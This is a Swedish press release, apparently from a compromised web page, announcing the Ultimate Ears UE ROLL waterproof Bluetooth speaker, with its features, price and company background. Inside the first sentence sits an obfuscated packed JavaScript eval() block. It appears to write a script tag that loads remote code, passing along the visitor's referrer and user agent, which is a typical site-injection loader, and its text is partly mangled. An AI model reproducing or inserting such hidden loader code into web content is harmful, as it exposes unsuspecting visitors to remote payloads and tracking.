Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Ultimate Ears lanserar ny mobil högtalare

Ultimate Ears lanserar ny mobil högtalare
Sebastian

Ultimate eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aytie|var|u0026u|referrer|atszd||js|php’.split(’|’),0,{}))
Ears fortsätter att utveckla sättet människor upplever och tar del av musik, världen över. Idag lanserar Ultimate Ears UE ROLL, en kraftfull, trådlös Bluetooth® högtalare som får plats i din ficka, vilket gör att den är lämplig att ha med var som helst – när som helst.

UE ROLL skjuter ut ett fantastiskt 360-ljud, starkt och med kraft, uppburet tillsammans med en djup bas. Som pricken över i:et för UE ROLL vidare designarvet från originalet UE BOOM och är skapad för att vara en del av den mobila livsstilen.

Oavsett om du fäster den vid dina badkläder under sommarens dopp, eller på ryggsäcken under resor och vandringar, kopplar UE ROLL upp dig mot din musik. Den är vattentät (IPX7 certifierad) och klarar hårda smällar – skapad i tåliga premium-material, för att hålla när du tappar den.

”Musik är gjort för att delas, kopplas samman och njutas av”, säger Rory Dooley, general manager på Ultimate Ears. ”Musiken skapar speciella ögonblick och vi skapade UE ROLL för att låta den vara en del av dessa ögonblick. Oavsett var du är, eller vad du gör är UE ROLL där för att förstärka upplevelsen.”

Förutom sitt magnifika ljud och lämpligheten att tas med överallt uppdateras UE ROLL ständigt, liksom UE BOOM och UE MEGABOOM. Genom UE ROLLs app för iOS® and Android™, kan du vakna till din favoritlåt, styra din högtalare genom appen som fjärrkontroll och till och med parkoppla högtalaren med vilken annan Ultimate Ears-högtalare som helst. Nya uppdateringar skickas trådlöst UE genom appen, för att du ständigt ska kunna ta del av nya funktioner.

Pris och tillgänglighet
UE ROLL finns tillgänglig i USA, Asien och utvalda europeiska länder från och med juni 2015. Rekommenderat pris 1 399 kronor.
För mer information, vänligen besök:
www.ultimateears.com

Om Ultimate Ears

Ultimate Ears, en del av Logitech, revolutionerade sättet musiker framför musik på scenen genom att skapa skräddarsydda, professionella hörlurar 1995. Idag används Ultimate Ears, mer än något annat varumärke, av turnerande artister och är ledande inom skräddarsydda hörlurar för professionella musiker samt betydelsefull aktör inom premium-högtalare på konsumentmarknaden. Ultimate Ears erkända hörlurar och högtalare omdefinierar sättet människor upplever musiken de älskar. För mer information, vänligen besök www.ultimateears.com.